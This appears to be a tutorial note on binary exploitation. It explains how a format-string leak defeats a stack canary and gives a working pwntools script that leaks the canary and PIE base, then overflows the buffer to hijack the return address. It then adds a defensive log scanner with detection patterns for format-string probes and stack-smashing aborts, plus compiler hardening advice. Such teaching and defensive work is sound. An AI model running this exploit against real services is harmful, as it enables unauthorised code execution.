Binary Exploitation with Canary Bypass

Last modified: 2023-02-12

Reverse Engineering

A stack canary is a random value that the compiler places between a function's local buffers and its saved frame pointer and return address. The function epilogue compares the value on the stack with the original; if a buffer overflow has changed it, the program aborts before the corrupted return address is used. A canary bypass defeats this check by leaking the canary value first (here through a format-string vulnerability) and then writing it back unchanged at its original position, so the overflow passes the check and the return address can still be overwritten.

Exploitation

from pwn import *

context.update(arch="amd64", os="linux")

filepath = "./example"
elf = context.binary = ELF(filepath)

p = process(filepath)  # p = remote("example.com", 1337) for a remote target (port is an int)

# Leak the stack canary and a code address through the format-string bug.
# The canary's lowest byte is always 0x00, so its leaked value ends with "00".
# To find the right stack slots, first send b"%p %p %p %p ..." (or "%N$p" with
# increasing N) and look for the value ending in 00; the other slot used here
# holds a return address into the binary, from which the PIE base is derived.
p.sendline(b"%10$p %13$p")
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
base = int(leaked[0], 16) - 0xa90  # 0xa90: offset of the leaked code address inside the binary
canary = int(leaked[1], 16)
elf.address = base

# Stack layout of the vulnerable frame: 24-byte buffer, 8-byte canary,
# 8-byte saved rbp, then the return address.
payload = b"A" * 24
payload += p64(canary)         # rewrite the canary with its own value so the check passes
payload += b"B" * 8            # saved rbp (its value does not matter here)
payload += p64(base + 0x6fe)   # 'ret' gadget to keep the stack 16-byte aligned before the call
payload += p64(elf.sym["target_func"])

p.sendline(payload)
p.interactive()
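From the defender's side, both halves of this technique leave traces: the canary leak needs untrusted input to reach printf as the format string (a run of "%p" or "%N$p" directives in what the program echoes back), and every attempt that does not reproduce the canary exactly makes glibc abort with the message "*** stack smashing detected ***". The following scanner is an added example, not part of the original note; it runs over a constructed application log and flags both signals. The log lines, the "app:" prefix and the threshold of two directives per line are assumptions for the example.

```python
import re

# Conversion directives that read stack slots, with or without a positional
# index: "%p", "%x", "%10$p", "%13$s". Two or more on one input line is the
# pattern of a format-string probe rather than ordinary text.
FORMAT_PROBE = re.compile(r"%(\d+\$)?[pxXsn]")

# Text glibc prints when a function epilogue finds the canary changed.
STACK_SMASH = "*** stack smashing detected ***"


def count_format_directives(line):
    """Return how many printf-style read directives appear in the line."""
    return len(FORMAT_PROBE.findall(line))


def scan_log(lines, threshold=2):
    """Return (line number, finding, count) tuples for suspicious log lines.

    'format-string-probe': at least `threshold` directives on one line.
    'canary-abort': the stack protector terminated the process.
    """
    findings = []
    for lineno, line in enumerate(lines, 1):
        n = count_format_directives(line)
        if n >= threshold:
            findings.append((lineno, "format-string-probe", n))
        if STACK_SMASH in line:
            findings.append((lineno, "canary-abort", 1))
    return findings


# Constructed sample log: ordinary echoed input, two leak probes, a benign
# percent sign, and the abort a failed canary overwrite produces.
SAMPLE_LOG = [
    "app: result: hello world",
    "app: result: %10$p %13$p",
    "app: result: %p %p %p %p %p %p",
    "app: result: upload 100% done",
    "app: *** stack smashing detected ***: terminated",
]


if __name__ == "__main__":
    for lineno, kind, count in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {kind} (x{count}) -> {SAMPLE_LOG[lineno - 1]}")
```

The fix for the leak itself is in the program, not the log scanner: never pass user input as the format argument (use printf("%s", buf)), compile with -Wformat -Wformat-security so the compiler flags printf(buf), and build with -D_FORTIFY_SOURCE=2 and -fstack-protector-strong so the remaining checks stay in place. A repeated "canary-abort" finding for one service is worth treating as an attempted overflow, since a correctly leaked canary never triggers it.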